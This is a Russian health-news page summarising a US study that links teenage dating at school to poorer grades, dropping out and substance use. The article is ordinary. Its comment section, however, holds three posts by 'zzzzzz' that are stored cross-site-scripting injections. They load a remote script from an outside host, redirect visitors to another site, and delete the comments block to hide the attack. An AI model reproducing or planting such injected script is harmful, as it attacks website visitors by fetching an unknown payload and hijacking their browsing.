Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ваш ребенок встречается с...  >>  Ваш ребенок встречается с кем-то в школе? Его выгонят!
 
Обратная связь
 

Ваш ребенок встречается с кем-то в школе? Его выгонят!

Размер шрифта
04 сентября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Именно в стенах школы ребенок, как правило, встречает свою первую любовь. Мы привыкли считать, что это светлое и прекрасное чувство, не задумываясь о том, как подростковые отношения сочетаются с учебным процессом. Быть может, не все так радужно? Американские ученые пришли к неожиданным результатам.

Ваш ребенок встречается с кем-то в школе? Его выгонят!

Оказалось, что подростковая любовь имеет обратную, темную сторону: ученики, регулярно встречающиеся со своими сверстниками, хуже учатся, в четыре раза чаще вылетают из школы и в два раза чаще употребляют алкоголь, табачную продукцию и марихуану.

«Романтические отношения являются очень характерным феноменом подросткового возраста, но ранее они не изучались подробно в научных исследованиях», – говорит Памела Орпинас, ведущий автор научной группы.

В течение семи лет ученые наблюдали за группой учеников, начиная с шестого и заканчивая двенадцатым классом (система среднего образования в США отличается от российской – прим. Zdorovieinfo). В конце учебного года ученики проходили анкетирование. Их опрашивали о подробностях личной жизни и о вредных привычках. Ученые не обошли вниманием и преподавателей: им задавали вопросы, касающиеся успеваемости детей.

«Абсолютно на всех этапах наблюдения выявилась совершенно четкая закономерность: чем реже ученик отвлекался на амурные дела, тем лучше он учился. Такие дети были более собраны и более ответственно подходили к выполнению домашних заданий и в целом прилежнее относились к учебному процессу», – рассказывает Орпинас.

Что касается бурной личной жизни, то она, как считают ученые, является компонентом поведенческой схемы, ассоциированной с повышенным риском. Именно поэтому подростковые отношения порой влекут за собой не только плохие оценки, но и дурные привычки (алкоголь, наркотики и так далее).

«Встречаться с одноклассником – примерно то же самое, что встречаться с коллегой по работе», – объясняет Орпинас. «Подростковые пары очень часто распадаются, но поскольку им волей-неволей приходится видеть друг друга каждый день, это может привести к стрессу и депрессии, особенно если один из бывших партнеров начинается встречаться с кем-то еще. И, конечно, это не может не отвлекать от обучения».

Авторы подчеркивают, что изучение этой проблемы далеко от завершения. В частности, необходимо выяснить, какие характеристики присущи здоровым подростковым отношениям, не ассоциированным с рискованным поведением.

В любом случае, если ваш ребенок влюбился – порадуйтесь за него, но держите ухо востро, чтобы опьянение от романтики не превратилось в опьянение от алкоголя.

Результаты исследования были опубликованы в журнале «Подростковый период» (Journal of Research on Adolescence).

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Почему девочки учатся лучше мальчишек? Оказывается, виноваты учителя!   Все, что вы помните о детстве, – неправда   ЭКО не влияет на здоровье детей   Даже дети знают, когда вы врете  
03 октября 2013Результаты благотворительного марафона «Всем миром» 17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца!
 
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 

Слайдшоу

1
Как правильно кормить грудью
Первые шаги вашего малыша
Как научить ребенка есть правильно. Что можно и нельзя

Тесты

1
Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.